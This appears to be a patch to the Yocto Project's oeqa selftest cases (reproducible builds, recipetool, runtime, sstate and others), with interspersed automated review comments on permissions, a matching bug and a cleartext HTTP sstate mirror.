67 status, _ = qemu.run("uname") 67 status, _ = qemu.run("uname")
@@ -70,7 +70,7 @@ class GlibcSelfTestBase(OESelftestTestCase, OEPTestResultTestCase):
70 # setup nfs mount 70 # setup nfs mount
71 if qemu.run("mkdir -p \"{0}\"".format(tmpdir))[0] != 0: 71 if qemu.run("mkdir -p \"{0}\"".format(tmpdir))[0] != 0:
72 raise Exception("Failed to setup NFS mount directory on target") 72 raise Exception("Failed to setup NFS mount directory on target")
73 mountcmd = "mount -o noac,nfsvers=3,port={0},udp,mountport={1} \"{2}:{3}\" \"{3}\"".format(nfsport, mountport, qemu.server_ip, tmpdir) 73 mountcmd = "mount -o noac,nfsvers=3,port={0},mountport={1} \"{2}:{3}\" \"{3}\"".format(nfsport, mountport, qemu.server_ip, tmpdir)
74 status, output = qemu.run(mountcmd) 74 status, output = qemu.run(mountcmd)
75 if status != 0: 75 if status != 0:
76 raise Exception("Failed to setup NFS mount on target ({})".format(repr(output))) 76 raise Exception("Failed to setup NFS mount on target ({})".format(repr(output)))
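--- a/meta/lib/oeqa/selftest/cases/gotoolchain.py
+++ b/meta/lib/oeqa/selftest/cases/gotoolchain.py
@@ -43,6 +43,12 @@ class oeGoToolchainSelfTest(OESelftestTestCase):
 
 @classmethod
 def tearDownClass(cls):
+# Go creates file which are readonly
+for dirpath, dirnames, filenames in os.walk(cls.tmpdir_SDKQA):
+for filename in filenames + dirnames:
+f = os.path.join(dirpath, filename)
+if not os.path.islink(f):
+os.chmod(f, 0o775)
 shutil.rmtree(cls.tmpdir_SDKQA, ignore_errors=True)
 super(oeGoToolchainSelfTest, cls).tearDownClass()
 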
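Review bot: The cleanup loop in tearDownClass applies `os.chmod(f, 0o775)` to every file as well as every directory, but removing an entry only needs write and search permission on its parent directory, so the file chmods are unnecessary and the mode is wider than the cleanup needs. Iterating only `dirnames` and using `os.chmod(f, 0o700)` behind the same `os.path.islink` guard would be enough and would avoid making the whole tree group-writable just before it is deleted. `shutil.rmtree(cls.tmpdir_SDKQA, ignore_errors=True)` still hides any entry that could not be removed, so a leftover tree goes unreported.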
diff --git a/meta/lib/oeqa/selftest/cases/imagefeatures.py b/meta/lib/oeqa/selftest/cases/imagefeatures.py
index 2b9c4998f7..535d80cb86 100644
--- a/meta/lib/oeqa/selftest/cases/imagefeatures.py
+++ b/meta/lib/oeqa/selftest/cases/imagefeatures.py
@@ -240,7 +240,7 @@ USERADD_GID_TABLES += "files/static-group"
240 def test_no_busybox_base_utils(self): 240 def test_no_busybox_base_utils(self):
241 config = """ 241 config = """
242# Enable x11 242# Enable x11
243DISTRO_FEATURES_append += "x11" 243DISTRO_FEATURES_append = " x11"
244 244
245# Switch to systemd 245# Switch to systemd
246DISTRO_FEATURES += "systemd" 246DISTRO_FEATURES += "systemd"
diff --git a/meta/lib/oeqa/selftest/cases/oelib/utils.py b/meta/lib/oeqa/selftest/cases/oelib/utils.py
index a7214beb4c..bbf67bf9c9 100644
--- a/meta/lib/oeqa/selftest/cases/oelib/utils.py
+++ b/meta/lib/oeqa/selftest/cases/oelib/utils.py
@@ -64,7 +64,7 @@ class TestMultiprocessLaunch(TestCase):
64 import bb 64 import bb
65 65
66 def testfunction(item, d): 66 def testfunction(item, d):
67 if item == "2" or item == "1": 67 if item == "2":
68 raise KeyError("Invalid number %s" % item) 68 raise KeyError("Invalid number %s" % item)
69 return "Found %s" % item 69 return "Found %s" % item
70 70
@@ -99,5 +99,4 @@ class TestMultiprocessLaunch(TestCase):
99 # Assert the function prints exceptions 99 # Assert the function prints exceptions
100 with captured_output() as (out, err): 100 with captured_output() as (out, err):
101 self.assertRaises(bb.BBHandledException, multiprocess_launch, testfunction, ["1", "2", "3", "4", "5", "6"], d, extraargs=(d,)) 101 self.assertRaises(bb.BBHandledException, multiprocess_launch, testfunction, ["1", "2", "3", "4", "5", "6"], d, extraargs=(d,))
102 self.assertIn("KeyError: 'Invalid number 1'", out.getvalue())
103 self.assertIn("KeyError: 'Invalid number 2'", out.getvalue()) 102 self.assertIn("KeyError: 'Invalid number 2'", out.getvalue())
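--- a/meta/lib/oeqa/selftest/cases/oescripts.py
+++ b/meta/lib/oeqa/selftest/cases/oescripts.py
@@ -133,7 +133,8 @@ class OEListPackageconfigTests(OEScriptTests):
 def check_endlines(self, results, expected_endlines):
 for line in results.output.splitlines():
 for el in expected_endlines:
-if line.split() == el.split():
+if line and line.split()[0] == el.split()[0] and \
+' '.join(sorted(el.split())) in ' '.join(sorted(line.split())):
 expected_endlines.remove(el)
 break
 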
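Review bot: The new condition in check_endlines tests `' '.join(sorted(el.split()))` as a substring of the sorted, joined tokens of the line, which is not a token-subset test: an extra token in `line` that sorts between two expected tokens breaks the match, and a partial token at the start or end of the joined string can satisfy it. A set comparison states the intent directly, `set(el.split()) <= set(line.split())`. The guard `line and line.split()[0]` also raises IndexError for a whitespace-only line or an empty `el`, because `split()` returns an empty list there; splitting once into `words = line.split()` and testing `words` avoids that. The rest of the method lies outside the hunk.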
diff --git a/meta/lib/oeqa/selftest/cases/prservice.py b/meta/lib/oeqa/selftest/cases/prservice.py
index 578b2b4dd9..fdc1e40058 100644
--- a/meta/lib/oeqa/selftest/cases/prservice.py
+++ b/meta/lib/oeqa/selftest/cases/prservice.py
@@ -75,7 +75,7 @@ class BitbakePrTests(OESelftestTestCase):
75 exported_db_path = os.path.join(self.builddir, 'export.inc') 75 exported_db_path = os.path.join(self.builddir, 'export.inc')
76 export_result = runCmd("bitbake-prserv-tool export %s" % exported_db_path, ignore_status=True) 76 export_result = runCmd("bitbake-prserv-tool export %s" % exported_db_path, ignore_status=True)
77 self.assertEqual(export_result.status, 0, msg="PR Service database export failed: %s" % export_result.output) 77 self.assertEqual(export_result.status, 0, msg="PR Service database export failed: %s" % export_result.output)
78 self.assertTrue(os.path.exists(exported_db_path)) 78 self.assertTrue(os.path.exists(exported_db_path), msg="%s didn't exist, tool output %s" % (exported_db_path, export_result.output))
79 79
80 if replace_current_db: 80 if replace_current_db:
81 current_db_path = os.path.join(get_bb_var('PERSISTENT_DIR'), 'prserv.sqlite3') 81 current_db_path = os.path.join(get_bb_var('PERSISTENT_DIR'), 'prserv.sqlite3')
diff --git a/meta/lib/oeqa/selftest/cases/recipetool.py b/meta/lib/oeqa/selftest/cases/recipetool.py
index c2ade2543a..e8aeea3023 100644
--- a/meta/lib/oeqa/selftest/cases/recipetool.py
+++ b/meta/lib/oeqa/selftest/cases/recipetool.py
@@ -370,7 +370,7 @@ class RecipetoolTests(RecipetoolBase):
370 tempsrc = os.path.join(self.tempdir, 'srctree') 370 tempsrc = os.path.join(self.tempdir, 'srctree')
371 os.makedirs(tempsrc) 371 os.makedirs(tempsrc)
372 recipefile = os.path.join(self.tempdir, 'libmatchbox.bb') 372 recipefile = os.path.join(self.tempdir, 'libmatchbox.bb')
373 srcuri = 'git://git.yoctoproject.org/libmatchbox' 373 srcuri = 'git://git.yoctoproject.org/libmatchbox;branch=master'
374 result = runCmd(['recipetool', 'create', '-o', recipefile, srcuri + ";rev=9f7cf8895ae2d39c465c04cc78e918c157420269", '-x', tempsrc]) 374 result = runCmd(['recipetool', 'create', '-o', recipefile, srcuri + ";rev=9f7cf8895ae2d39c465c04cc78e918c157420269", '-x', tempsrc])
375 self.assertTrue(os.path.isfile(recipefile), 'recipetool did not create recipe file; output:\n%s' % result.output) 375 self.assertTrue(os.path.isfile(recipefile), 'recipetool did not create recipe file; output:\n%s' % result.output)
376 checkvars = {} 376 checkvars = {}
@@ -456,7 +456,7 @@ class RecipetoolTests(RecipetoolBase):
456 self.assertTrue(os.path.isfile(recipefile)) 456 self.assertTrue(os.path.isfile(recipefile))
457 checkvars = {} 457 checkvars = {}
458 checkvars['LICENSE'] = set(['Apache-2.0']) 458 checkvars['LICENSE'] = set(['Apache-2.0'])
459 checkvars['SRC_URI'] = 'git://github.com/mesonbuild/meson;protocol=https' 459 checkvars['SRC_URI'] = 'git://github.com/mesonbuild/meson;protocol=https;branch=master'
460 inherits = ['setuptools3'] 460 inherits = ['setuptools3']
461 self._test_recipe_contents(recipefile, checkvars, inherits) 461 self._test_recipe_contents(recipefile, checkvars, inherits)
462 462
@@ -523,7 +523,7 @@ class RecipetoolTests(RecipetoolBase):
523 self.assertTrue(os.path.isfile(recipefile)) 523 self.assertTrue(os.path.isfile(recipefile))
524 checkvars = {} 524 checkvars = {}
525 checkvars['LICENSE'] = set(['GPLv2']) 525 checkvars['LICENSE'] = set(['GPLv2'])
526 checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/matchbox-terminal;protocol=http' 526 checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/matchbox-terminal;protocol=http;branch=master'
527 inherits = ['pkgconfig', 'autotools'] 527 inherits = ['pkgconfig', 'autotools']
528 self._test_recipe_contents(recipefile, checkvars, inherits) 528 self._test_recipe_contents(recipefile, checkvars, inherits)
529 529
diff --git a/meta/lib/oeqa/selftest/cases/reproducible.py b/meta/lib/oeqa/selftest/cases/reproducible.py
index d4800022df..be4cdcc429 100644
--- a/meta/lib/oeqa/selftest/cases/reproducible.py
+++ b/meta/lib/oeqa/selftest/cases/reproducible.py
@@ -17,6 +17,57 @@ import stat
17import os 17import os
18import datetime 18import datetime
19 19
20# For sample packages, see:
21# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201127-0t7wr_oo/
22# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201127-4s9ejwyp/
23# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201127-haiwdlbr/
24# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201127-hwds3mcl/
25# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201203-sua0pzvc/
26# (both packages/ and packages-excluded/)
27exclude_packages = [
28 'acpica-src',
29 'babeltrace2-ptest',
30 'bind',
31 'bootchart2-doc',
32 'epiphany',
33 'gcr',
34 'glide',
35 'go-dep',
36 'go-helloworld',
37 'go-runtime',
38 'go_',
39 'gstreamer1.0-python',
40 'hwlatdetect',
41 'kernel-devsrc',
42 'libcap-ng',
43 'libjson',
44 'libproxy',
45 'lttng-tools-dbg',
46 'lttng-tools-ptest',
47 'ltp',
48 'ovmf-shell-efi',
49 'parted-ptest',
50 'perf',
51 'piglit',
52 'pybootchartgui',
53 'qemu',
54 'quilt-ptest',
55 'rsync',
56 'ruby',
57 'stress-ng',
58 'systemd-bootchart',
59 'systemtap',
60 'valgrind-ptest',
61 'webkitgtk',
62 ]
63
64def is_excluded(package):
65 package_name = os.path.basename(package)
66 for i in exclude_packages:
67 if package_name.startswith(i):
68 return i
69 return None
70
20MISSING = 'MISSING' 71MISSING = 'MISSING'
21DIFFERENT = 'DIFFERENT' 72DIFFERENT = 'DIFFERENT'
22SAME = 'SAME' 73SAME = 'SAME'
@@ -39,14 +90,21 @@ class PackageCompareResults(object):
39 self.total = [] 90 self.total = []
40 self.missing = [] 91 self.missing = []
41 self.different = [] 92 self.different = []
93 self.different_excluded = []
42 self.same = [] 94 self.same = []
95 self.active_exclusions = set()
43 96
44 def add_result(self, r): 97 def add_result(self, r):
45 self.total.append(r) 98 self.total.append(r)
46 if r.status == MISSING: 99 if r.status == MISSING:
47 self.missing.append(r) 100 self.missing.append(r)
48 elif r.status == DIFFERENT: 101 elif r.status == DIFFERENT:
49 self.different.append(r) 102 exclusion = is_excluded(r.reference)
103 if exclusion:
104 self.different_excluded.append(r)
105 self.active_exclusions.add(exclusion)
106 else:
107 self.different.append(r)
50 else: 108 else:
51 self.same.append(r) 109 self.same.append(r)
52 110
@@ -54,10 +112,14 @@ class PackageCompareResults(object):
54 self.total.sort() 112 self.total.sort()
55 self.missing.sort() 113 self.missing.sort()
56 self.different.sort() 114 self.different.sort()
115 self.different_excluded.sort()
57 self.same.sort() 116 self.same.sort()
58 117
59 def __str__(self): 118 def __str__(self):
60 return 'same=%i different=%i missing=%i total=%i' % (len(self.same), len(self.different), len(self.missing), len(self.total)) 119 return 'same=%i different=%i different_excluded=%i missing=%i total=%i\nunused_exclusions=%s' % (len(self.same), len(self.different), len(self.different_excluded), len(self.missing), len(self.total), self.unused_exclusions())
120
121 def unused_exclusions(self):
122 return sorted(set(exclude_packages) - self.active_exclusions)
61 123
62def compare_file(reference, test, diffutils_sysroot): 124def compare_file(reference, test, diffutils_sysroot):
63 result = CompareResult() 125 result = CompareResult()
@@ -68,7 +130,7 @@ def compare_file(reference, test, diffutils_sysroot):
68 result.status = MISSING 130 result.status = MISSING
69 return result 131 return result
70 132
71 r = runCmd(['cmp', '--quiet', reference, test], native_sysroot=diffutils_sysroot, ignore_status=True) 133 r = runCmd(['cmp', '--quiet', reference, test], native_sysroot=diffutils_sysroot, ignore_status=True, sync=False)
72 134
73 if r.status: 135 if r.status:
74 result.status = DIFFERENT 136 result.status = DIFFERENT
@@ -77,9 +139,41 @@ def compare_file(reference, test, diffutils_sysroot):
77 result.status = SAME 139 result.status = SAME
78 return result 140 return result
79 141
142def run_diffoscope(a_dir, b_dir, html_dir, **kwargs):
143 return runCmd(['diffoscope', '--no-default-limits', '--exclude-directory-metadata', 'yes', '--html-dir', html_dir, a_dir, b_dir],
144 **kwargs)
145
146class DiffoscopeTests(OESelftestTestCase):
147 diffoscope_test_files = os.path.join(os.path.dirname(os.path.abspath(__file__)), "diffoscope")
148
149 def test_diffoscope(self):
150 bitbake("diffoscope-native -c addto_recipe_sysroot")
151 diffoscope_sysroot = get_bb_var("RECIPE_SYSROOT_NATIVE", "diffoscope-native")
152
153 # Check that diffoscope doesn't return an error when the files compare
154 # the same (a general check that diffoscope is working)
155 with tempfile.TemporaryDirectory() as tmpdir:
156 run_diffoscope('A', 'A', tmpdir,
157 native_sysroot=diffoscope_sysroot, cwd=self.diffoscope_test_files)
158
159 # Check that diffoscope generates an index.html file when the files are
160 # different
161 with tempfile.TemporaryDirectory() as tmpdir:
162 r = run_diffoscope('A', 'B', tmpdir,
163 native_sysroot=diffoscope_sysroot, ignore_status=True, cwd=self.diffoscope_test_files)
164
165 self.assertNotEqual(r.status, 0, msg="diffoscope was successful when an error was expected")
166 self.assertTrue(os.path.exists(os.path.join(tmpdir, 'index.html')), "HTML index not found!")
167
80class ReproducibleTests(OESelftestTestCase): 168class ReproducibleTests(OESelftestTestCase):
169 # Test the reproducibility of whatever is built between sstate_targets and targets
170
81 package_classes = ['deb', 'ipk'] 171 package_classes = ['deb', 'ipk']
82 images = ['core-image-minimal', 'core-image-sato', 'core-image-full-cmdline'] 172
173 # targets are the things we want to test the reproducibility of
174 targets = ['core-image-minimal', 'core-image-sato', 'core-image-full-cmdline', 'world']
175 # sstate targets are things to pull from sstate to potentially cut build/debugging time
176 sstate_targets = []
83 save_results = False 177 save_results = False
84 if 'OEQA_DEBUGGING_SAVED_OUTPUT' in os.environ: 178 if 'OEQA_DEBUGGING_SAVED_OUTPUT' in os.environ:
85 save_results = os.environ['OEQA_DEBUGGING_SAVED_OUTPUT'] 179 save_results = os.environ['OEQA_DEBUGGING_SAVED_OUTPUT']
@@ -94,7 +188,7 @@ class ReproducibleTests(OESelftestTestCase):
94 188
95 def setUpLocal(self): 189 def setUpLocal(self):
96 super().setUpLocal() 190 super().setUpLocal()
97 needed_vars = ['TOPDIR', 'TARGET_PREFIX', 'BB_NUMBER_THREADS'] 191 needed_vars = ['TOPDIR', 'TARGET_PREFIX', 'BB_NUMBER_THREADS', 'BB_HASHSERVE']
98 bb_vars = get_bb_vars(needed_vars) 192 bb_vars = get_bb_vars(needed_vars)
99 for v in needed_vars: 193 for v in needed_vars:
100 setattr(self, v.lower(), bb_vars[v]) 194 setattr(self, v.lower(), bb_vars[v])
@@ -150,21 +244,29 @@ class ReproducibleTests(OESelftestTestCase):
150 PACKAGE_CLASSES = "{package_classes}" 244 PACKAGE_CLASSES = "{package_classes}"
151 INHIBIT_PACKAGE_STRIP = "1" 245 INHIBIT_PACKAGE_STRIP = "1"
152 TMPDIR = "{tmpdir}" 246 TMPDIR = "{tmpdir}"
247 LICENSE_FLAGS_WHITELIST = "commercial"
248 DISTRO_FEATURES_append = ' systemd pam'
153 ''').format(package_classes=' '.join('package_%s' % c for c in self.package_classes), 249 ''').format(package_classes=' '.join('package_%s' % c for c in self.package_classes),
154 tmpdir=tmpdir) 250 tmpdir=tmpdir)
155 251
156 if not use_sstate: 252 if not use_sstate:
253 if self.sstate_targets:
254 self.logger.info("Building prebuild for %s (sstate allowed)..." % (name))
255 self.write_config(config)
256 bitbake(' '.join(self.sstate_targets))
257
157 # This config fragment will disable using shared and the sstate 258 # This config fragment will disable using shared and the sstate
158 # mirror, forcing a complete build from scratch 259 # mirror, forcing a complete build from scratch
159 config += textwrap.dedent('''\ 260 config += textwrap.dedent('''\
160 SSTATE_DIR = "${TMPDIR}/sstate" 261 SSTATE_DIR = "${TMPDIR}/sstate"
161 SSTATE_MIRRORS = "" 262 SSTATE_MIRRORS = "file://.*/.*-native.* http://sstate.yoctoproject.org/all/PATH;downloadfilename=PATH file://.*/.*-cross.* http://sstate.yoctoproject.org/all/PATH;downloadfilename=PATH"
162 ''') 263 ''')
163 264
164 self.logger.info("Building %s (sstate%s allowed)..." % (name, '' if use_sstate else ' NOT')) 265 self.logger.info("Building %s (sstate%s allowed)..." % (name, '' if use_sstate else ' NOT'))
165 self.write_config(config) 266 self.write_config(config)
166 d = get_bb_vars(capture_vars) 267 d = get_bb_vars(capture_vars)
167 bitbake(' '.join(self.images)) 268 # targets used to be called images
269 bitbake(' '.join(getattr(self, 'images', self.targets)))
168 return d 270 return d
169 271
170 def test_reproducible_builds(self): 272 def test_reproducible_builds(self):
@@ -212,6 +314,7 @@ class ReproducibleTests(OESelftestTestCase):
212 314
213 self.write_package_list(package_class, 'missing', result.missing) 315 self.write_package_list(package_class, 'missing', result.missing)
214 self.write_package_list(package_class, 'different', result.different) 316 self.write_package_list(package_class, 'different', result.different)
317 self.write_package_list(package_class, 'different_excluded', result.different_excluded)
215 self.write_package_list(package_class, 'same', result.same) 318 self.write_package_list(package_class, 'same', result.same)
216 319
217 if self.save_results: 320 if self.save_results:
@@ -219,8 +322,12 @@ class ReproducibleTests(OESelftestTestCase):
219 self.copy_file(d.reference, '/'.join([save_dir, 'packages', strip_topdir(d.reference)])) 322 self.copy_file(d.reference, '/'.join([save_dir, 'packages', strip_topdir(d.reference)]))
220 self.copy_file(d.test, '/'.join([save_dir, 'packages', strip_topdir(d.test)])) 323 self.copy_file(d.test, '/'.join([save_dir, 'packages', strip_topdir(d.test)]))
221 324
325 for d in result.different_excluded:
326 self.copy_file(d.reference, '/'.join([save_dir, 'packages-excluded', strip_topdir(d.reference)]))
327 self.copy_file(d.test, '/'.join([save_dir, 'packages-excluded', strip_topdir(d.test)]))
328
222 if result.missing or result.different: 329 if result.missing or result.different:
223 fails.append("The following %s packages are missing or different: %s" % 330 fails.append("The following %s packages are missing or different and not in exclusion list: %s" %
224 (c, '\n'.join(r.test for r in (result.missing + result.different)))) 331 (c, '\n'.join(r.test for r in (result.missing + result.different))))
225 332
226 # Clean up empty directories 333 # Clean up empty directories
@@ -235,7 +342,7 @@ class ReproducibleTests(OESelftestTestCase):
235 # Copy jquery to improve the diffoscope output usability 342 # Copy jquery to improve the diffoscope output usability
236 self.copy_file(os.path.join(jquery_sysroot, 'usr/share/javascript/jquery/jquery.min.js'), os.path.join(package_html_dir, 'jquery.js')) 343 self.copy_file(os.path.join(jquery_sysroot, 'usr/share/javascript/jquery/jquery.min.js'), os.path.join(package_html_dir, 'jquery.js'))
237 344
238 runCmd(['diffoscope', '--no-default-limits', '--exclude-directory-metadata', '--html-dir', package_html_dir, 'reproducibleA', 'reproducibleB'], 345 run_diffoscope('reproducibleA', 'reproducibleB', package_html_dir,
239 native_sysroot=diffoscope_sysroot, ignore_status=True, cwd=package_dir) 346 native_sysroot=diffoscope_sysroot, ignore_status=True, cwd=package_dir)
240 347
241 if fails: 348 if fails:
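Review bot: In the `if not use_sstate:` branch, the new `SSTATE_MIRRORS` value pulls every `-native` and `-cross` sstate object from `http://sstate.yoctoproject.org` over cleartext HTTP, and those objects then run on the build host to produce the packages whose reproducibility is compared. Nothing in the hunk shows signature checking for these objects, so their integrity appears to rest on the transport alone; an `https://` mirror URL (if the server offers it) or `SSTATE_VERIFY_SIG = "1"` in the fragment (if the mirror's objects are signed) would close that gap. The comment above the fragment still says it disables the sstate mirror and forces a complete build from scratch, which no longer holds; something like `# Only -native and -cross objects may come from the sstate mirror; target packages are rebuilt from scratch` would match the new behaviour.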
diff --git a/meta/lib/oeqa/selftest/cases/runcmd.py b/meta/lib/oeqa/selftest/cases/runcmd.py
index fa6113d7fa..e9612389fe 100644
--- a/meta/lib/oeqa/selftest/cases/runcmd.py
+++ b/meta/lib/oeqa/selftest/cases/runcmd.py
@@ -27,8 +27,8 @@ class RunCmdTests(OESelftestTestCase):
27 27
28 # The delta is intentionally smaller than the timeout, to detect cases where 28 # The delta is intentionally smaller than the timeout, to detect cases where
29 # we incorrectly apply the timeout more than once. 29 # we incorrectly apply the timeout more than once.
30 TIMEOUT = 5 30 TIMEOUT = 10
31 DELTA = 3 31 DELTA = 8
32 32
33 def test_result_okay(self): 33 def test_result_okay(self):
34 result = runCmd("true") 34 result = runCmd("true")
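--- a/meta/lib/oeqa/selftest/cases/runqemu.py
+++ b/meta/lib/oeqa/selftest/cases/runqemu.py
@@ -163,12 +163,11 @@ class QemuTest(OESelftestTestCase):
 bitbake(cls.recipe)
 
 def _start_qemu_shutdown_check_if_shutdown_succeeded(self, qemu, timeout):
+# Allow the runner's LoggingThread instance to exit without errors
+# (such as the exception "Console connection closed unexpectedly")
+# as qemu will disappear when we shut it down
+qemu.runner.allowexit()
 qemu.run_serial("shutdown -h now")
-# Stop thread will stop the LoggingThread instance used for logging
-# qemu through serial console, stop thread will prevent this code
-# from facing exception (Console connection closed unexpectedly)
-# when qemu was shutdown by the above shutdown command
-qemu.runner.stop_thread()
 time_track = 0
 try:
 while True: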
diff --git a/meta/lib/oeqa/selftest/cases/runtime_test.py b/meta/lib/oeqa/selftest/cases/runtime_test.py
index 976b513727..cc4190c1d6 100644
--- a/meta/lib/oeqa/selftest/cases/runtime_test.py
+++ b/meta/lib/oeqa/selftest/cases/runtime_test.py
@@ -14,11 +14,6 @@ from oeqa.core.decorator.data import skipIfNotQemu
14 14
15class TestExport(OESelftestTestCase): 15class TestExport(OESelftestTestCase):
16 16
17 @classmethod
18 def tearDownClass(cls):
19 runCmd("rm -rf /tmp/sdk")
20 super(TestExport, cls).tearDownClass()
21
22 def test_testexport_basic(self): 17 def test_testexport_basic(self):
23 """ 18 """
24 Summary: Check basic testexport functionality with only ping test enabled. 19 Summary: Check basic testexport functionality with only ping test enabled.
@@ -95,19 +90,20 @@ class TestExport(OESelftestTestCase):
95 msg = "Couldn't find SDK tarball: %s" % tarball_path 90 msg = "Couldn't find SDK tarball: %s" % tarball_path
96 self.assertEqual(os.path.isfile(tarball_path), True, msg) 91 self.assertEqual(os.path.isfile(tarball_path), True, msg)
97 92
98 # Extract SDK and run tar from SDK 93 with tempfile.TemporaryDirectory() as tmpdirname:
99 result = runCmd("%s -y -d /tmp/sdk" % tarball_path) 94 # Extract SDK and run tar from SDK
100 self.assertEqual(0, result.status, "Couldn't extract SDK") 95 result = runCmd("%s -y -d %s" % (tarball_path, tmpdirname))
96 self.assertEqual(0, result.status, "Couldn't extract SDK")
101 97
102 env_script = result.output.split()[-1] 98 env_script = result.output.split()[-1]
103 result = runCmd(". %s; which tar" % env_script, shell=True) 99 result = runCmd(". %s; which tar" % env_script, shell=True)
104 self.assertEqual(0, result.status, "Couldn't setup SDK environment") 100 self.assertEqual(0, result.status, "Couldn't setup SDK environment")
105 is_sdk_tar = True if "/tmp/sdk" in result.output else False 101 is_sdk_tar = True if tmpdirname in result.output else False
106 self.assertTrue(is_sdk_tar, "Couldn't setup SDK environment") 102 self.assertTrue(is_sdk_tar, "Couldn't setup SDK environment")
107 103
108 tar_sdk = result.output 104 tar_sdk = result.output
109 result = runCmd("%s --version" % tar_sdk) 105 result = runCmd("%s --version" % tar_sdk)
110 self.assertEqual(0, result.status, "Couldn't run tar from SDK") 106 self.assertEqual(0, result.status, "Couldn't run tar from SDK")
111 107
112 108
113class TestImage(OESelftestTestCase): 109class TestImage(OESelftestTestCase):
@@ -179,12 +175,24 @@ class TestImage(OESelftestTestCase):
179 if "DISPLAY" not in os.environ: 175 if "DISPLAY" not in os.environ:
180 self.skipTest("virgl gtk test must be run inside a X session") 176 self.skipTest("virgl gtk test must be run inside a X session")
181 distro = oe.lsb.distro_identifier() 177 distro = oe.lsb.distro_identifier()
178 if distro and distro.startswith('almalinux'):
179 self.skipTest('virgl isn\'t working with Alma Linux')
180 if distro and distro.startswith('rocky'):
181 self.skipTest('virgl isn\'t working with Rocky Linux')
182 if distro and distro == 'debian-8': 182 if distro and distro == 'debian-8':
183 self.skipTest('virgl isn\'t working with Debian 8') 183 self.skipTest('virgl isn\'t working with Debian 8')
184 if distro and distro == 'centos-7': 184 if distro and distro == 'centos-7':
185 self.skipTest('virgl isn\'t working with Centos 7') 185 self.skipTest('virgl isn\'t working with Centos 7')
186 if distro and distro == 'centos-8':
187 self.skipTest('virgl isn\'t working with Centos 8')
188 if distro and distro.startswith('fedora'):
189 self.skipTest('virgl isn\'t working with Fedora')
186 if distro and distro == 'opensuseleap-15.0': 190 if distro and distro == 'opensuseleap-15.0':
187 self.skipTest('virgl isn\'t working with Opensuse 15.0') 191 self.skipTest('virgl isn\'t working with Opensuse 15.0')
192 if distro and distro == 'ubuntu-22.04':
193 self.skipTest('virgl isn\'t working with Ubuntu 22.04')
194 if distro and distro == 'ubuntu-22.10':
195 self.skipTest('virgl isn\'t working with Ubuntu 22.10')
188 196
189 qemu_packageconfig = get_bb_var('PACKAGECONFIG', 'qemu-system-native') 197 qemu_packageconfig = get_bb_var('PACKAGECONFIG', 'qemu-system-native')
190 sdl_packageconfig = get_bb_var('PACKAGECONFIG', 'libsdl2-native') 198 sdl_packageconfig = get_bb_var('PACKAGECONFIG', 'libsdl2-native')
@@ -220,6 +228,7 @@ class TestImage(OESelftestTestCase):
220 Author: Alexander Kanavin <alex.kanavin@gmail.com> 228 Author: Alexander Kanavin <alex.kanavin@gmail.com>
221 """ 229 """
222 import subprocess, os 230 import subprocess, os
231 self.skipTest("Crashes in mesa observed with this test on dunfell: https://bugzilla.yoctoproject.org/show_bug.cgi?id=14527")
223 try: 232 try:
224 content = os.listdir("/dev/dri") 233 content = os.listdir("/dev/dri")
225 if len([i for i in content if i.startswith('render')]) == 0: 234 if len([i for i in content if i.startswith('render')]) == 0:
@@ -227,7 +236,7 @@ class TestImage(OESelftestTestCase):
227 except FileNotFoundError: 236 except FileNotFoundError:
228 self.skipTest("/dev/dri directory does not exist; no render nodes available on this machine.") 237 self.skipTest("/dev/dri directory does not exist; no render nodes available on this machine.")
229 try: 238 try:
230 dripath = subprocess.check_output("pkg-config --variable=dridriverdir dri", shell=True) 239 dripath = subprocess.check_output("PATH=/bin:/usr/bin:$PATH pkg-config --variable=dridriverdir dri", shell=True)
231 except subprocess.CalledProcessError as e: 240 except subprocess.CalledProcessError as e:
232 self.skipTest("Could not determine the path to dri drivers on the host via pkg-config.\nPlease install Mesa development files (particularly, dri.pc) on the host machine.") 241 self.skipTest("Could not determine the path to dri drivers on the host via pkg-config.\nPlease install Mesa development files (particularly, dri.pc) on the host machine.")
233 qemu_packageconfig = get_bb_var('PACKAGECONFIG', 'qemu-system-native') 242 qemu_packageconfig = get_bb_var('PACKAGECONFIG', 'qemu-system-native')
diff --git a/meta/lib/oeqa/selftest/cases/sstatetests.py b/meta/lib/oeqa/selftest/cases/sstatetests.py
index c46e8ba489..1bfe88c87d 100644
--- a/meta/lib/oeqa/selftest/cases/sstatetests.py
+++ b/meta/lib/oeqa/selftest/cases/sstatetests.py
@@ -39,7 +39,7 @@ class SStateTests(SStateBase):
39 39
40 recipefile = os.path.join(tempdir, "recipes-test", "dbus-wait-test", 'dbus-wait-test_git.bb') 40 recipefile = os.path.join(tempdir, "recipes-test", "dbus-wait-test", 'dbus-wait-test_git.bb')
41 os.makedirs(os.path.dirname(recipefile)) 41 os.makedirs(os.path.dirname(recipefile))
42 srcuri = 'git://' + srcdir + ';protocol=file' 42 srcuri = 'git://' + srcdir + ';protocol=file;branch=master'
43 result = runCmd(['recipetool', 'create', '-o', recipefile, srcuri]) 43 result = runCmd(['recipetool', 'create', '-o', recipefile, srcuri])
44 self.assertTrue(os.path.isfile(recipefile), 'recipetool did not create recipe file; output:\n%s' % result.output) 44 self.assertTrue(os.path.isfile(recipefile), 'recipetool did not create recipe file; output:\n%s' % result.output)
45 45
@@ -137,7 +137,7 @@ class SStateTests(SStateBase):
137 filtered_results.append(r) 137 filtered_results.append(r)
138 self.assertTrue(filtered_results == [], msg="Found distro non-specific sstate for: %s (%s)" % (', '.join(map(str, targets)), str(filtered_results))) 138 self.assertTrue(filtered_results == [], msg="Found distro non-specific sstate for: %s (%s)" % (', '.join(map(str, targets)), str(filtered_results)))
139 file_tracker_1 = self.search_sstate('|'.join(map(str, [s + r'.*?\.tgz$' for s in targets])), distro_specific=True, distro_nonspecific=False) 139 file_tracker_1 = self.search_sstate('|'.join(map(str, [s + r'.*?\.tgz$' for s in targets])), distro_specific=True, distro_nonspecific=False)
140 self.assertTrue(len(file_tracker_1) >= len(targets), msg = "Not all sstate files ware created for: %s" % ', '.join(map(str, targets))) 140 self.assertTrue(len(file_tracker_1) >= len(targets), msg = "Not all sstate files were created for: %s" % ', '.join(map(str, targets)))
141 141
142 self.track_for_cleanup(self.distro_specific_sstate + "_old") 142 self.track_for_cleanup(self.distro_specific_sstate + "_old")
